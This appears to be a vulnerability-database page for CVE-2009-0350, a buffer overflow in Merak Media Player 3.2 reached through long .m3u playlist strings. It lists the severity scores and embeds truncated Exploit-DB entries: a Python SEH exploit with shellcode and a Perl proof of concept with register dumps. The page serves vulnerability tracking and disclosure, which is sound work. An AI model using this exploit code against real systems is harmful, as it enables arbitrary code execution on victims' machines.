CVE-2009-0350
published 2009-01-29CVE-2009-0350: Stack-based buffer overflow in Merak Media Player 3.2 allows remote attackers to execute arbitrary code via a long string in a .m3u playlist file, related to…
PriorityP345critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
10.20%
95.1th percentile
Stack-based buffer overflow in Merak Media Player 3.2 allows remote attackers to execute arbitrary code via a long string in a .m3u playlist file, related to the status bar icon's tooltip. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| merak | media_player | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Merak Media Player 3.2 - '.m3u' File Local Buffer Overflow (SEH)
exploitdb·2009-03-02
CVE-2009-0350 Merak Media Player 3.2 - '.m3u' File Local Buffer Overflow (SEH)
Merak Media Player 3.2 - '.m3u' File Local Buffer Overflow (SEH)
---
#exploit.py
#
# Merak Media Player 3.2 Buffer Overflow Exploit(SEH)
# By:Encrypt3d.M!nd
# m1nd3d.wordpress.com
#
# Orginal Advisory:
# http://www.milw0rm.com/exploits/7857
######################################################
# Nothing Intersting in this exploit,too easy
# just improving my SEH exploitation Skills :p
#
ns = "\xEB\x06\x90\x90"
sh = "\x35\x2F\xD1\x72" # msacm32.drv ..windows xp sp2
chars = "A" * 74
nops = "\x90" * 20
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum
http://metasploit.com
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32
Exploit-DB
Merak Media Player 3.2 - '.m3u' File Local Buffer Overflow (PoC)
exploitdb·2009-01-25
CVE-2009-0350 Merak Media Player 3.2 - '.m3u' File Local Buffer Overflow (PoC)
Merak Media Player 3.2 - '.m3u' File Local Buffer Overflow (PoC)
---
#!/usr/bin/perl -w
# Author : Houssamix
# Merak Media Player V3.2 m3u file Local Buffer overflow (SEH)
# Download : http://www.qwerks.com/download/3748/merak.zip
# --------------------------------------------
# EAX 00000000
# ECX 45454545
# EDX 7C9137D8 ntdll.7C9137D8
# EBX 00000000
# ESP 0013F784
# EBP 0013F7A4
# ESI 00000000
# EDI 00000000
# EIP 45454545
# 0013FBE4 42424242 Pointer to next SEH record
# 0013FBE8 45454545 SE handler
# ---------------------------------------------
print "===================================================================== \n";
print "Author : Houssamix \n";
print "===================================================================== \n";
print "Merak Media Player V3.2 m3u file Loca
No writeups or analysis indexed.
2009-01-29
Published